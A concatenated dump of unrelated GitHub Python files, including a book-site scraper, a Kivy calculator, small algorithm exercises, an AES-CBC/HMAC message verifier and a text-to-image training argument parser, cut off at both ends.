category_tmp = category_url[:36]\n\n temp_links = []\n # If next page \n next_page_urls = get_next_page(category_url)\n if next_page_urls:\n for url in next_page_urls:\n temp_links.extend(get_tmp_books_urls(url))\n else:\n get_tmp_books_urls(category_url)\n\n # working urls\n links = []\n for link in temp_links:\n # modifies the links since url isn't complete\n if 'http' not in link:\n tmp_url = link[8:]\n book_url = '{}{}'.format(category_tmp ,tmp_url)\n links.append(book_url)\n \n return links\n \n\ndef get_category_url(website_url, main_html):\n content = main_html.find('ul', class_='nav-list')\n get_link = content.findAll('a')\n links = []\n for link in get_link:\n if 'http' not in link:\n url = '{}{}'.format(website_url, link['href'])\n links.append(url)\n return links\n\nimport csv\ndef save_csv(book):\n # create csv file with book data\n header = [\n 'product_page_url',\n 'universal_product_code',\n 'title',\n 'price_including_tax',\n 'price_excluding_tax',\n 'number_available',\n 'product_description',\n 'category',\n 'review_rating',\n 'image_url'\n ]\n # save information to csv file\n filename = 'misc/csv/%s.csv' % book['category']\n\n if os.path.isfile(filename):\n with open(filename, 'a', newline='') as output_file:\n writer = csv.DictWriter(output_file, fieldnames=header)\n writer.writerow(book)\n else: \n with open(filename, 'w') as output_file:\n writer = csv.DictWriter(output_file, fieldnames=header)\n writer.writeheader()\n writer.writerow(book) \n\n\ndef download_book_image(book_image_url): \n # download image to misc/images/\n # get image file name\n img = str(book_image_url[45:]) \n with open('misc/images/'+ str(img), 'wb') as f:\n response = requests.get(book_image_url)\n return f.write(response.content)\n\n# ================================ main ================================ #\n\"\"\"\nbook information extraction on each category present\n\"\"\"\n\n\"\"\"\ncreate misc folder with 2 sub folder:\n1. csv folder - which will contain csv files for the scrape data\n2. images folder - which contains images of each book\n\"\"\"\nimport os\nfolders = ['misc', \"misc/csv\", \"misc/images\"]\nfor folder in folders:\n if not os.path.exists(folder):\n os.mkdir(folder)\n \n\n################################### version 1 : 20 min ###################################\n\"\"\"\ntry:\n website_url = 'https://books.toscrape.com/'\n main_html = html_parser(website_url)\n category_url = get_category_url(website_url, main_html)\n for category in category_url[1:]:\n books_link = get_all_books_url(category)\n for book_url in books_link:\n print('data collection : ', book_url)\n data = get_book_info(book_url)\n save_csv(data) \n print('collection of data and download image was successfull') \nexcept:\n print('Unexpected error!') \n\"\"\"\n\n################################### version 2 : 5 min ###################################\n\"\"\"\ncategories =[]\n\ntry:\n website_url = 'https://books.toscrape.com/'\n main_html = html_parser(website_url)\n category_url = get_category_url(website_url, main_html)\n \n for url in category_url[1:]:\n categories.append(url)\n\n print('Collection of data and download image was successfull') \nexcept:\n print('Unexpected error!') \n\nclass myThread (threading.Thread):\n def __init__(self, threadID, name, q):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.q = q\n def run(self):\n print(\"Starting \" + self.name)\n process_data(self.name, self.q)\n print(\"Exiting \" + self.name)\n\ndef process_data(q):\n while not exitFlag:\n queueLock.acquire()\n if not workQueue.empty():\n data = q.get()\n queueLock.release()\n books_link = get_all_books_url(data)\n for book_url in books_link:\n print('data collection : ', book_url)\n try:\n data = get_book_info(book_url)\n save_csv(data) \n except:\n print(\"erreur\") \n else:\n queueLock.release()\n time.sleep(1)\n\n\n# Create new threads\ntic = time.perf_counter() # Start Time\nfor tName in threadlist:\n thread = myThread(threadID, tName, workQueue)\n thread.start()\n threads.append(thread)\n threadID += 1\n\n# Fill the queue\nqueueLock.acquire()\nfor word in categories:\n workQueue.put(word)\nqueueLock.release()\n\n# Wait for queue to empty\nwhile not workQueue.empty():\n pass\n\n# Notify threads it's time to exit\nexitFlag = 1\n\n# Wait for all threads to complete\nfor t in threads:\n t.join()\n\ntoc = time.perf_counter() # End Time \nprint(f\"Build finished in {(toc - tic)/60:0.0f} minutes {(toc - tic)%60:0.0f} seconds\") \n\n\"\"\"\n\n################################### version 3 : 3 min ###################################\n\ndef scrape(category_url): \n books_link = get_all_books_url(category_url)\n for book_url in books_link:\n try:\n data = get_book_info(book_url)\n save_csv(data) \n except Exception as e:\n print(f\"Error has occur on this url: {book_url}\")\n\ntic = time.perf_counter() # Start Time\ntry:\n website_url = 'https://books.toscrape.com/'\n main_html = html_parser(website_url)\n category_url = get_category_url(website_url, main_html)\n with concurrent.futures.ThreadPoolExecutor() as executor:\n executor.map(scrape, category_url[1:])\n print('Collection of data and download image was successfull') \nexcept:\n print('Unexpected error!') \ntoc = time.perf_counter() # End Time \nprint(f\"Build finished in {(toc - tic)/60:0.0f} minutes {(toc - tic)%60:0.0f} seconds\")","repo_name":"jheslian/scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31155535511","text":"import os\nimport logging\n\nimport datetime\n\n\ndef create_mapping(m1, m2, d1):\n if m1 not in d1.keys():\n d1[m1] = []\n d1[m1].append(m2)\n return d1[m1]\n\n\ndef from_bokeh_timestamp(x, ref_date=datetime.datetime(1970, 1, 1),\n time_unit=\"milliseconds\"):\n ms = [\"milliseconds\", \"ms\"]\n if time_unit in ms:\n time_unit = \"seconds\"\n x = x / 1000\n new_date = ref_date + datetime.timedelta(**{time_unit: x})\n return new_date\n\n\ndef to_bokeh_timestamp(x, ref_date=datetime.datetime(1970, 1, 1),\n time_unit=\"milliseconds\"):\n ms = [\"milliseconds\", \"ms\"]\n new_timestamp = (x - ref_date).total_seconds()\n if time_unit in ms:\n new_timestamp = new_timestamp * 1000\n return new_timestamp\n\n\n# def add_timedelta(timeunit, timesteps, ref_date):\n# input_dict = {timeunit: timesteps}\n# new_date = ref_date + datetime.timedelta(**input_dict)\n# return new_date\n\n# setup logger\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\nsh = logging.StreamHandler()\nsh.setLevel(logging.INFO)\nlogger.addHandler(sh)\n","repo_name":"davedekoning1/bokeh_test","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72422097747","text":"import random\n\nclass TreeNode(object):\n def __init__(self, value='', left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n self.size = 1\n\n def insert_in_order(self, value):\n\n if value < self.value:\n if not self.left:\n self.left = TreeNode(value=value)\n else:\n self.left.insert_in_order(value)\n \n else:\n if not self.right:\n self.right = TreeNode(value=value)\n \n else:\n self.right.insert_in_order(value)\n \n self.size += 1\n\n\n def get_random_node(self, index = None):\n if not self:\n return\n \n if not index:\n index = random.randint(1, self.size)\n\n left_size = self.left.size if self.left else 0\n\n if index == left_size:\n return self\n \n elif index < left_size:\n return self.left.get_random_node(index=index)\n \n elif self.right:\n return self.right.get_random_node(index=index - (left_size + 1))\n\n\n def find(self, value):\n if not self:\n return \n\n if value == self.value:\n return self\n\n elif value < self.value:\n return self.left.find(value)\n \n else: \n return self.right.find(value)\n\n \ndef tests():\n root = TreeNode(5)\n root.insert_in_order(3)\n root.insert_in_order(2)\n root.insert_in_order(7)\n root.insert_in_order(6)\n\n arr = [5, 3, 2, 7, 6]\n assert root.get_random_node().value in arr\n\nif __name__ == \"__main__\":\n tests()","repo_name":"hadrizia/coding","sub_path":"code/cracking-the-coding-interview/cap_4_tree_and_graphs.py/4.11.random_node.py","file_name":"4.11.random_node.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25656836495","text":"import sys\n\nsys.setrecursionlimit(10 ** 7)\nrl = sys.stdin.readline\n\n\nclass BinaryIndexedTree:\n # 1-indexed\n def __init__(self, n):\n self.n = n\n self.data = [0] * (n + 1)\n \n def add(self, i, x):\n # Accessed by 0-indexed\n i += 1\n while i <= self.n:\n self.data[i] += x\n i += i & -i\n \n def sum(self, i):\n # [0, i)\n res = 0\n while i:\n res += self.data[i]\n i -= i & -i\n return res\n \n def bisect_left(self, w):\n if w <= 0:\n return 0\n i = 0\n k = 1 << (self.n.bit_length() - 1)\n while 0 < k:\n if i + k <= self.n and self.data[i + k] < w:\n w -= self.data[i + k]\n i += k\n k >>= 1\n return i + 1\n\n\ndef solve():\n N, K = map(int, rl().split())\n a = tuple(int(rl()) for _ in range(N))\n \n b = [0]\n acc = 0\n for i in range(N):\n acc += a[i]\n b.append(acc - (i + 1) * K)\n \n compress = {bi: idx for idx, bi in enumerate(sorted(b))}\n bit = BinaryIndexedTree(N + 1)\n \n ans = 0\n for bi in b:\n ans += bit.sum(compress[bi] + 1)\n bit.add(compress[bi], 1)\n print(ans)\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"yuly3/atcoder","sub_path":"ARC/ARC075/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27531527164","text":"import kivy\r\nkivy.require('1.11.1')\r\nfrom kivy.app import App\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.uix.textinput import TextInput\r\nfrom kivy.uix.button import Button\r\nfrom kivy import Config\r\nConfig.set('graphics', 'multisamples', '0')\r\n\r\n\r\nclass SimpleCalculatorApp(App):\r\n def build(self):\r\n self.operators = [\"/\", \"*\", \"+\", \"-\"]\r\n self.last_was_operator = None\r\n self.last_button = None\r\n main_layout = BoxLayout(orientation=\"vertical\")\r\n self.solution = TextInput(multiline=False, readonly=True, halign=\"right\", font_size=55)\r\n main_layout.add_widget(self.solution)\r\n #create button labels\r\n buttons = [\r\n [\"7\", \"8\", \"9\", \"/\"],\r\n [\"4\", \"5\", \"6\", \"*\"],\r\n [\"1\", \"2\", \"3\", \"-\"],\r\n [\".\", \"0\", \"C\", \"+\"]\r\n ]\r\n #create buttons with boxlayout for each row\r\n for row in buttons:\r\n h_layout = BoxLayout()\r\n for label in row:\r\n button = Button(text=label)\r\n #add on press event function\r\n button.bind(on_press=self.on_button_press)\r\n h_layout.add_widget(button)\r\n #add each row layout to mainlayout\r\n main_layout.add_widget(h_layout)\r\n #create equal button\r\n equals_button = Button(text=\"=\")\r\n equals_button.bind(on_press=self.on_solution)\r\n #add equal_button to main layout\r\n main_layout.add_widget(equals_button)\r\n\r\n return main_layout\r\n\r\n\r\n def on_button_press(self, instance):\r\n current = self.solution.text\r\n button_text = instance.text\r\n\r\n if button_text == \"C\":\r\n self.solution.text=\"\"\r\n else:\r\n if current and (self.last_was_operator and button_text in self.operators):\r\n #if operators are pressed symultaneously, dont do anything\r\n return\r\n elif current ==\"\" and button_text in self.operators:\r\n #if first press is operator, dont do anything\r\n return\r\n else:\r\n new_text = current + button_text\r\n self.solution.text = new_text\r\n\r\n self.last_button = button_text\r\n self.last_was_operator = self.last_button in self.operators\r\n\r\n def on_solution(self,instance):\r\n text = self.solution.text\r\n if text:\r\n solution = str(eval(self.solution.text))\r\n self.solution.text = solution\r\n\r\n\r\nif __name__ == '__main__':\r\n SimpleCalculatorApp().run()\r\n","repo_name":"iduryodhanrao/Pygames","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1134691586","text":"import argparse\nfrom pathlib import Path\nimport os\nimport json\nimport sys\n\nparser = argparse.ArgumentParser(description='Combine averitec files split according to the combine_decorate_files scheme.')\nparser.add_argument('--scheme', default=\"/rds/user/mss84/hpc-work/datasets/averitec/full_data/date.test.with_qs.X.json\", help='')\nargs = parser.parse_args()\n\np = Path(args.scheme)\nfolder = p.parent\nfile_scheme = p.name\nprefix, suffix = file_scheme.split(\"X\")\n\nexamples = {}\n\nfor file in os.listdir(folder):\n if file.startswith(prefix) and file.endswith(suffix) and len(file.split(\".\")) == len(file_scheme.split(\".\")):\n span = [int(x) for x in file[len(prefix):-len(suffix)].split(\"-\")]\n print(\"Reading examples \" + str(span[0]) + \" to \" + str(span[1]) + \".\", file=sys.stderr)\n\n with open(str(folder) + \"/\" +file) as f:\n file_examples = json.load(f)\n for idx, example in enumerate(file_examples):\n if idx+span[0] in examples:\n print(\"Error: Index overlap at index \"+str(idx+span[0]), file=sys.stderr)\n exit()\n examples[idx+span[0]] = example\n\nprint(\"Combining \"+str(len(examples)) + \" examples.\", file=sys.stderr)\nout_examples = [None] * len(examples)\n\nfor idx, example in examples.items():\n out_examples[idx] = example\n\nfor example in out_examples:\n if example is None:\n print(\"Error: Index mismatch\", file=sys.stderr)\n exit()\n\nprint(json.dumps(out_examples, indent=4))","repo_name":"MichSchli/AVeriTeC","sub_path":"retrieval_reranking/combine_decorated_files.py","file_name":"combine_decorated_files.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"27995506354","text":"import numpy as np\nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \n# from rake_nltk import Rake\nimport json\nimport re\nstop_words = set(stopwords.words('english'))\n\n\nmin_thresh_len = 50\n################## Methods ###################\n# query 1 -> minimal number of stopwords ratio\n# query 2 -> ACT or abberviations match \n# query 3 -> v, vs, versus comes in middle\n# query 4 -> long para, stopwords ratio more\n##############################################\n\n# def hasNumbers(string) :\n# return bool(re.search(r'\\d', string))\n\ndef is_query2(query) :\n query = query.lower()\n\n fd = open('abbreviation_mapping.json')\n\n abberviations = json.load(fd)\n \n query_words = re.split(' |, |\\. ', query)\n\n if \"act\" in query_words or \"bill\" in query_words :\n return 2\n\n for key in abberviations:\n if key == \"\":\n continue\n if key.lower() in query_words and key.lower() not in stop_words:\n return 2\n\n return -1\n\n\n\n\ndef is_query3(query) :\n query = query.lower()\n\n query = query.replace('.', '')\n\n if query.find(\" v \") != -1 or query.find(\" vs \") !=-1 or query.find(\" versus \") !=-1:\n return 3\n else:\n return -1\n\n\ndef is_query4(query) :\n query = query.lower()\n\n query_words = re.split(', |\\. | ', query)\n\n if len(query_words) < 8:\n return -1\n \n stop_count = 0\n count = 0\n\n for word in query_words:\n if word == \"\":\n continue\n if word in stop_words:\n stop_count += 1\n count += 1\n\n if count == 0:\n return -1\n \n stop_count /= count\n \n if stop_count > 0.3:\n return 4\n else:\n return -1\n \n \ndef query_identifier(query) :\n\n # query 2\n type_of_query = is_query2(query)\n\n if type_of_query is 2 :\n return type_of_query\n\n # query 3\n type_of_query = is_query3(query)\n\n if type_of_query is 3:\n return type_of_query\n \n # query 4\n type_of_query = is_query4(query)\n\n if type_of_query is 4:\n return type_of_query\n\n return 1\n\n\n# print (\"Enter query\")\n\n# query = input()\n\n# print(query_identifier(query))\n","repo_name":"142ayushkumar/LegalAssistant","sub_path":"query_identifier/query_identifier.py","file_name":"query_identifier.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13450081798","text":"from newindice import findex\nimport pytest\nimport numpy as np\n\n\n@pytest.mark.parametrize('myin, expect', [\n\n (np.array([1, 2, 3]), [3, 1]),\n (([1, 2, 3]), [3, 1]),\n (np.array([3, -2, 1]), [3, -2]),\n\n])\ndef test_findex(myin, expect):\n nt, mt = findex(myin)\n\n assert nt == expect[0]\n assert mt == expect[1]\n\n\n@pytest.mark.parametrize('myin_, expect_', [\n\n (np.array([1, 2, 3]), False),\n (([1, 2, 3]), False),\n (np.array([3, -2, 1]), False),\n ([], True),\n (1, True),\n ('n', True),\n\n])\ndef test_findex2(myin_, expect_):\n try:\n findex(myin_)\n myb = False\n except TypeError:\n myb = True\n finally:\n assert myb == expect_\n","repo_name":"MattGuptil/bme590hrm","sub_path":"test_findex.py","file_name":"test_findex.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34549583830","text":"from pyprocessing import *\n\np = [None] * 3\nshift = 1.0\nfade = 0\nfillCol = 0\nrot = 0\nspin = 0\n\n\ndef setup():\n size(200, 200)\n background(0)\n smooth()\n global fade, spin\n fade = 255.0 / (width / 2.0 / shift)\n spin = 360.0 / (width / 2.0 / shift)\n p[0] = PVector(-width / 2, height / 2)\n p[1] = PVector(width / 2, height / 2)\n p[2] = PVector(0, -height / 2)\n noStroke()\n translate(width / 2, height / 2)\n triBlur()\n\n\ndef triBlur():\n global fillCol, rot\n fill(fillCol)\n fillCol += fade\n rotate(spin)\n # another interesting variation: uncomment the line below\n # rot+=radians(spin) rotate(rot)\n p[0].x += shift\n p[0].y -= shift\n p[1].x -= shift\n p[1].y -= shift\n p[2].y += shift\n triangle(p[0].x, p[0].y, p[1].x, p[1].y, p[2].x, p[2].y)\n if p[0].x < 0:\n # recursive call\n triBlur()\n\n\nrun()\n","repo_name":"reign912/MazeGenerator-Solver","sub_path":"pyprocessing/examples/misc/triflower.py","file_name":"triflower.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121486226","text":"# https://atcoder.jp/contests/dwacon2018-prelims/submissions/15406971\n# A - ニコニコ文字列判定\nimport sys\n\nsys.setrecursionlimit(10 ** 7)\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\ndef resolve():\n s = input()\n if s[0] == s[2] and s[1] == s[3]:\n print(\"Yes\")\n else:\n print(\"No\")\n\n\nif __name__ == '__main__':\n resolve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/DWANGO_2018_Qual/DWANGO_2018_Qual-A.py","file_name":"DWANGO_2018_Qual-A.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14980535776","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\n\ninput = sys.argv\nif len(input) !=2:\n\tprint('Usage: {} SEQ'.format(sys.argv[0]))\n\tsys.exit(1)\n\nrna = input[1]\nprocode = dict()\nfile = open('codons.rna').read().split()\ncount = 0\nfor line in file:\n\tif count % 2 ==0:\n\t\tprocode[line] = '' \t\n\t\tprev = line\n\telse:\n\t\tprocode[prev] = line\n\tcount+=1\n\nk=3\nprotein = []\nfor i in range(0, len(rna), k):\n\tfor key in procode.keys():\n\t\tif rna[i:i+k].lower() == key.lower():\n\t\t\tprotein.append(procode[key])\n\nprint('{}'.format(''.join(protein)))\n\t\n\n\n","repo_name":"cmrrsn/abe487","sub_path":"problems/proteins/prot.py","file_name":"prot.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33104214550","text":"#Week 5, Task 1\r\n\r\n''' This code features a linked list. I was tasked to create a function that will delete the duplicate nodes from\r\nthe linked list.'''\r\n\r\nimport unittest\r\n\r\nclass Node(object):\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n self.prev = None\r\n\r\n\r\nclass List(object):\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def insert(self, n, x):\r\n if n != None:\r\n x.next = n.next\r\n n.next = x\r\n x.prev = n\r\n if x.next != None:\r\n x.next.prev = x\r\n if self.head == None:\r\n self.head = self.tail = x\r\n x.prev = x.next = None\r\n elif self.tail == n:\r\n self.tail = x\r\n\r\n def display(self):\r\n values = []\r\n n = self.head\r\n while n != None:\r\n values.append(str(n.value))\r\n n = n.next\r\n print(\"List: \", \",\".join(values))\r\n\r\n def delete_duplicates(self): # Week 5, Task 1\r\n\r\n '''Python doesn't really have pointers, they are more\r\n references to objects. They are kind of mutable memory. For\r\n example a temporary pointer1 gets the address of self.head, but\r\n it can be handled independently, without reference to head in\r\n particular'''\r\n\r\n pointer1 = self.head #head is the first node of a linked list\r\n #assigns the address of head to temporary pointer\r\n while pointer1 != None and pointer1.next != None: #continue the loop until nodes have value\r\n pointer2 = pointer1 #assign another pointer, which will point to the memory address of pointer1\r\n while pointer2.next != None: #as long as the next node has value\r\n if pointer1.value == pointer2.next.value: #check if the values of both pointers match\r\n pointer2.next = pointer2.next.next #results in original pointer2.next getting deleted\r\n else:\r\n pointer2 = pointer2.next #pointer2 takes the value of the next node\r\n pointer1 = pointer1.next #pointer1 takes the value of the next node and continues the loop\r\n\r\nif __name__ == '__main__':\r\n l = List()\r\n l.insert(None, Node(4))\r\n l.insert(l.head, Node(2))\r\n l.insert(l.head, Node(6))\r\n l.insert(l.head, Node(8))\r\n l.insert(l.head, Node(6))\r\n l.insert(l.head, Node(8))\r\n l.display()\r\n l.delete_duplicates()\r\n l.display()\r\n\r\n","repo_name":"gerganzh/Python-Mini-Projects","sub_path":"LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29674970195","text":"import sys, getopt\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import SHA256, HMAC\nfrom Crypto import Random\nfrom CBCMessageEncrypter import CBCMessageEncrypter\nfrom MACandEncryptionKeyManager import MACandEncryptionKeyManager\n\nclass CBCMessageVerification():\n\n def decryptMessage(self, receiver, msg):\n # parse the message\n header = msg[0:9] # header is 9 bytes long\n iv = msg[9:9 + AES.block_size] # iv is AES.block_size bytes long\n encrypted = msg[(9 + AES.block_size):] # the rest of the message is the encrypted part\n header_version = header[0:2] # version is encoded on 2 bytes\n header_type = header[2:3] # type is encoded on 1 byte\n header_length = header[3:5] # msg length is encoded on 2 bytes\n header_sqn = header[5:9] # msg sqn is encoded on 4 bytes\n\n # sender = header_type.decode('utf-8')\n\n #CHANGE\n # rcvsqn = 0\n # sndsqn = 1\n\n efile = open('../netsim/network/' + receiver + '/encryption_key.pem', 'rb')\n enckey = efile.read()\n enckey = bytes.fromhex(enckey.decode('utf-8'))\n\n #print(type(enckey))\n\n mfile = open('../netsim/network/' + receiver + '/mac_key.pem', 'rb')\n mackey = mfile.read()\n mackey = bytes.fromhex(mackey.decode('utf-8'))\n\n print(\"Message header:\")\n print(\" - protocol version: \" + header_version.hex() + \" (\" + str(header_version[0]) + \".\" + str(header_version[1]) + \")\")\n print(\" - message type: \" + header_type.hex() + \" (\" + str(int.from_bytes(header_type, byteorder='big')) + \")\")\n print(\" - message length: \" + header_length.hex() + \" (\" + str(int.from_bytes(header_length, byteorder='big')) + \")\")\n print(\" - message sequence number: \" + header_sqn.hex() + \" (\" + str(int.from_bytes(header_sqn, byteorder='big')) + \")\")\n\n # check the msg length\n if len(msg) != int.from_bytes(header_length, byteorder='big'):\n print(\"Warning: Message length value in header is wrong!\")\n print(\"Processing is continued nevertheless...\")\n\n # sndsqn = int.from_bytes(header_type, byteorder='big')\n # rcvsqn = int.from_bytes(rec, byteorder='big')\n sender = header_type.decode('utf-8')\n rcvsqnFile = open('../netsim/network/' + receiver + '/rcvsqn/rcvstate' + sender + '.txt' , 'r')\n rcvsqn = rcvsqnFile.read()\n rcvsqnFile.close()\n\n sndsqnFile = open('../netsim/network/' + sender + '/sndsqn/sndstate' + sender + '.txt' , 'r')\n sndsqn = sndsqnFile.read()\n sndsqnFile.close()\n\n # check the sequence number\n print('Receiver: ' + receiver + ' -- sqn#: ' + rcvsqn)\n print('Sender: ' + sender + ' -- sqn#: ' + sndsqn)\n\n Mac_Encryption_manager = MACandEncryptionKeyManager()\n Mac_Encryption_manager.check_sqn_number(receiver, sender, sndsqn)\n\n # print(\"Expecting sequence number \" + str(int(rcvsqn) + 1) + \" or larger...\")\n # if (rcvsqn >= sndsqn):\n # print(\"Error: Message sequence number is too old!\")\n # sys.exit(1)\n # print(\"Sequence number verification is successful.\")\n\n payload = encrypted[:-32]\n mac = encrypted[-32:]\n # verify the mac\n print(\"MAC verification is being performed...\")\n MAC = HMAC.new(mackey, digestmod=SHA256) # create a HMAC object, pass the right key and specify SHA256 as the hash fn\n MAC.update(header)\n MAC.update(payload)\n MAC.update(iv)\n comp_mac = MAC.digest() # compute the final HMAC value\n\n # print(\"MAC value received: \" + mac.hex())\n # print(\"MAC value computed: \" + comp_mac.hex())\n #print(len(mac))\n if (comp_mac != mac):\n print(\"Error: MAC verification failed!\")\n sys.exit(1)\n print(\"MAC verified correctly.\")\n\n # decrypt the encrypted part\n print(\"Decryption is attempted...\")\n ENC = AES.new(enckey, AES.MODE_CBC, iv)\n decrypted = ENC.decrypt(encrypted)\n\n # remove padding\n i = -1\n decrypted = decrypted[:-32]\n while (decrypted[i] == 0x00): i -= 1\n padding = decrypted[i:]\n decrypted = decrypted[:i]\n # print(\"Padding \" + padding.hex() + \" is observed\")\n if(padding[0] != 0x80):\n print(\"Error: Wrong padding detected!\")\n sys.exit(1)\n print(\"Padding is successfully removed.\")\n return decrypted\n\n\n# test = CBCMessageVerification()\n# encrypter = CBCMessageEncrypter()\n# testString = 'this is a long test that we run here'\n# test.decryptMessage('B', encrypter.encryptMessage('A', testString))\n","repo_name":"zackrossman10/encrypted_messenger","sub_path":"crypto/CBCMessageVerification.py","file_name":"CBCMessageVerification.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10077093633","text":"import argparse\n\n\ndef get_ti_parser(**parser_kwargs):\n def str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in (\"yes\", \"true\", \"t\", \"y\", \"1\"):\n return True\n elif v.lower() in (\"no\", \"false\", \"f\", \"n\", \"0\"):\n return False\n else:\n raise argparse.ArgumentTypeError(\"Boolean value expected.\")\n\n parser = argparse.ArgumentParser(**parser_kwargs)\n parser.add_argument(\n \"-n\",\n \"--name\",\n type=str,\n const=True,\n default=\"\",\n nargs=\"?\",\n help=\"postfix for logdir\",\n )\n parser.add_argument(\n \"-r\",\n \"--resume\",\n type=str,\n const=True,\n default=\"\",\n nargs=\"?\",\n help=\"resume from logdir or checkpoint in logdir\",\n )\n parser.add_argument(\n \"-b\",\n \"--base\",\n nargs=\"*\",\n metavar=\"base_config.yaml\",\n help=\"paths to base configs. Loaded from left-to-right. \"\n \"Parameters can be overwritten or added with command-line options of the form `--key value`.\",\n default=list(),\n )\n parser.add_argument(\n \"-t\",\n \"--train\",\n type=str2bool,\n const=True,\n default=False,\n nargs=\"?\",\n help=\"train\",\n )\n parser.add_argument(\n \"--no-test\",\n type=str2bool,\n const=True,\n default=False,\n nargs=\"?\",\n help=\"disable test\",\n )\n parser.add_argument(\n \"-p\",\n \"--project\",\n help=\"name of new or path to existing project\"\n )\n parser.add_argument(\n \"-d\",\n \"--debug\",\n type=str2bool,\n nargs=\"?\",\n const=True,\n default=False,\n help=\"enable post-mortem debugging\",\n )\n parser.add_argument(\n \"-s\",\n \"--seed\",\n type=int,\n default=23,\n help=\"seed for seed_everything\",\n )\n parser.add_argument(\n \"-f\",\n \"--postfix\",\n type=str,\n default=\"\",\n help=\"post-postfix for default name\",\n )\n parser.add_argument(\n \"-l\",\n \"--logdir\",\n type=str,\n default=\"logs\",\n help=\"directory for logging dat shit\",\n )\n parser.add_argument(\n \"--scale_lr\",\n type=str2bool,\n nargs=\"?\",\n const=True,\n default=True,\n help=\"scale base-lr by ngpu * batch_size * n_accumulate\",\n )\n\n parser.add_argument(\n \"--datadir_in_name\",\n type=str2bool,\n nargs=\"?\",\n const=True,\n default=True,\n help=\"Prepend the final directory in the data_root to the output directory name\")\n\n parser.add_argument(\n \"--use_facial_loss\",\n action='store_true',\n help=\"Use facial loss when fine tuning text-to-image model\"\n )\n\n parser.add_argument(\n \"--use_random_prompt\",\n action='store_true',\n help=\"Use random prompt when fine tuning text-to-image model\"\n )\n\n parser.add_argument(\n \"--descriptive_p\",\n type=float,\n default=0.2,\n help=\"concatenate descriptive words with given probabilities\"\n )\n\n parser.add_argument(\n \"--gamma\",\n type=float,\n default=0.1,\n help=\"ratio of what momentum vector update embedding vector\"\n )\n\n parser.add_argument(\"--actual_resume\",\n type=str,\n required=True,\n help=\"Path to model to actually resume from\")\n\n parser.add_argument(\"--data_root\",\n type=str,\n required=True,\n help=\"Path to directory with training images\")\n\n parser.add_argument(\"--embedding_manager_ckpt\",\n type=str,\n default=\"\",\n help=\"Initialize embedding manager from a checkpoint\")\n\n parser.add_argument(\"--placeholder_string\",\n type=str,\n help=\"Placeholder string which will be used to denote the concept in future prompts. Overwrites the config options.\")\n\n parser.add_argument(\"--init_word\",\n type=str,\n help=\"Word to use as source for initial token embedding\")\n\n parser.add_argument(\n \"--negative_prompt\",\n type=str,\n nargs=\"?\",\n default=\"deformed, cripple, ugly, additional arms, additional legs, additional head, two heads, multiple people, group of people black and white, grayscale, collage, cropped head, out of frame, blurry, group of people, morbid, mutilated, extra fingers, mutated hands, poorly drawn hands, poorly drawn face, mutation, bad anatomy, bad proportions, extra limbs, disfigured, malformed limbs, missing arms, missing legs, extra arms, extra legs, fused fingers, too many fingers\",\n help=\"the negative prompt to sample during training\"\n )\n\n parser.add_argument(\n \"--class_word\",\n type=str,\n help=\"Word to embed next to the identifier\"\n )\n\n return parser\n\n\ndef get_txt2img_parser(**parser_kwargs):\n parser = argparse.ArgumentParser(**parser_kwargs)\n\n parser.add_argument(\n \"--name\",\n type=str,\n nargs=\"?\",\n default=\"woman\",\n help=\"the sampled image name\"\n )\n parser.add_argument(\n \"--prompt\",\n type=str,\n nargs=\"?\",\n default=\"a painting of a virus monster playing guitar\",\n help=\"the prompt to render\"\n )\n parser.add_argument(\n \"--negative_prompt\",\n type=str,\n nargs=\"?\",\n default=\"deformed, cripple, ugly, additional arms, additional legs, additional head, two heads, multiple people, group of people black and white, grayscale, collage, cropped head, out of frame, blurry, group of people, morbid, mutilated, extra fingers, mutated hands, poorly drawn hands, poorly drawn 